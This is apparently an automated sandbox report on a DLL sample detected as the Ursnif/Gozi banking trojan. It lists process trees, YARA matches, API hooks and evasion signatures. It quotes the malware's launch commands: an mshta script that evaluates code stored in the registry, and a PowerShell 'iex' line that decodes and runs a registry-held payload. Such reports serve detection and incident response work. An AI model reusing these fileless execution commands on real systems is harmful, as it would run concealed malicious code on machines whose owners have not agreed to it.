Source: C:\Windows\System32\control.exe	Code function: 38_2_00DB2B40		38_2_00DB2B40
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC0304		38_2_00DC0304
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC44FC		38_2_00DC44FC
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DBDC88		38_2_00DBDC88
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DB74A8		38_2_00DB74A8
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DD1C68		38_2_00DD1C68
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DDD468		38_2_00DDD468
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DD9C04		38_2_00DD9C04
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC3438		38_2_00DC3438
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DD7DDC		38_2_00DD7DDC
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DB559C		38_2_00DB559C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DD75B4		38_2_00DD75B4
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DD15A0		38_2_00DD15A0
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DD0D40		38_2_00DD0D40
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DDED7C		38_2_00DDED7C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC1D14		38_2_00DC1D14
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DB9514		38_2_00DB9514
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC7500		38_2_00DC7500
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DB1D20		38_2_00DB1D20
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DCBE9C		38_2_00DCBE9C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DDEFD0		38_2_00DDEFD0
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC97C8		38_2_00DC97C8
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DB3F98		38_2_00DB3F98
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC4F5C		38_2_00DC4F5C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DCEF7C		38_2_00DCEF7C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC2F1C		38_2_00DC2F1C

PE file does not import any functions

Source: 3upkr1gh.dll.39.dr	Static PE information: No import functions for PE file found
Source: blohq23h.dll.35.dr	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: Ne6A4k8vK6.dll

Binary or memory string: OriginalFilenameSing.dllD vs Ne6A4k8vK6.dll

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Uses 32bit PE files

Source: Ne6A4k8vK6.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Yara signature match

Source: 00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000021.00000003.428480646.000001F9546C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000026.00000002.464915515.0000000000DEE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: Ne6A4k8vK6.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Classification label

Source: classification engine

Classification label: mal100.troj.evad.winDLL@29/157@18/4

Contains functionality to enum processes or threads

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_008F31DD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

1_2_008F31DD

Creates files inside the user directory

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Creates mutexes

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{0AA26757-E129-CCB9-BBDE-A5C01FF2A9F4}
Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{2AF9A97E-8156-ECBD-5BFE-45E0BF124914}
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{02620BBB-79B9-8494-1356-BDF8F7EA41AC}

Creates temporary files

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFCDBB0AFC48C6CA54.TMP

Jump to behavior

PE file has an executable .text section and no other executable section

Source: Ne6A4k8vK6.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Reads ini files

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Sample is known by Antivirus

Source: Ne6A4k8vK6.dll

Virustotal: Detection: 13%

Sample might require command line arguments

Source: regsvr32.exe

String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address

Spawns processes

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\Ne6A4k8vK6.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Ne6A4k8vK6.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6744 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6744 CREDAT:17426 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6744 CREDAT:17432 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6744 CREDAT:17442 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\blohq23h\blohq23h.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESA54D.tmp' 'c:\Users\user\AppData\Local\Temp\blohq23h\CSC8288F7A0C087479098ACD74FC9F3E61F.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3upkr1gh\3upkr1gh.cmdline'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Ne6A4k8vK6.dll			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6744 CREDAT:17410 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6744 CREDAT:17426 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6744 CREDAT:17432 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6744 CREDAT:17442 /prefetch:2			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\blohq23h\blohq23h.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3upkr1gh\3upkr1gh.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESA54D.tmp' 'c:\Users\user\AppData\Local\Temp\blohq23h\CSC8288F7A0C087479098ACD74FC9F3E61F.TMP'
Source: C:\Windows\System32\control.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: unknown unknown

Uses an in-process (OLE) Automation server

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Reads internet explorer settings

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

PE file contains a mix of data directories often seen in goodware

Source: Ne6A4k8vK6.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Ne6A4k8vK6.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Ne6A4k8vK6.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Ne6A4k8vK6.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Ne6A4k8vK6.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Ne6A4k8vK6.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

PE file contains a debug data directory

Source: Ne6A4k8vK6.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000023.00000002.411859001.000002A2AAE80000.00000002.00000001.sdmp, csc.exe, 00000027.00000002.420747019.00000269E51E0000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.415909336.0000000005BD0000.00000004.00000001.sdmp
Source:	Binary string: c:\Pieceespecially\watchPeriod\farmShine\Sing.pdb source: Ne6A4k8vK6.dll
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.415909336.0000000005BD0000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 00000026.00000002.467494612.000001A5E2DCC000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000026.00000002.467494612.000001A5E2DCC000.00000004.00000040.sdmp

PE file contains a valid data directory to section mapping

Source: Ne6A4k8vK6.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Ne6A4k8vK6.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Ne6A4k8vK6.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Ne6A4k8vK6.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Ne6A4k8vK6.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))

Compiles C# or VB.Net code

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\blohq23h\blohq23h.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3upkr1gh\3upkr1gh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\blohq23h\blohq23h.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3upkr1gh\3upkr1gh.cmdline'

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_042F505D RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,

1_2_042F505D

Registers a DLL

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Ne6A4k8vK6.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_008FABF0 push ecx; ret		1_2_008FABF9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_008FAF23 push ecx; ret		1_2_008FAF33
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0431769F push ecx; ret		1_2_043176AF
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DBC115 push 3B000001h; retf		38_2_00DBC11A

Binary may include packed or encrypted code

Source: initial sample

Static PE information: section name: .text entropy: 6.87915642356

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\blohq23h\blohq23h.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\3upkr1gh\3upkr1gh.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.336276523.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336080557.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336180979.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336303683.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.343871778.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.428480646.000001F9546C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.455040534.00000000042F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.464915515.0000000000DEE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336209770.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336248371.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.406882710.0000000004330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336157909.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336112691.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 2156, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3732, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6708, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
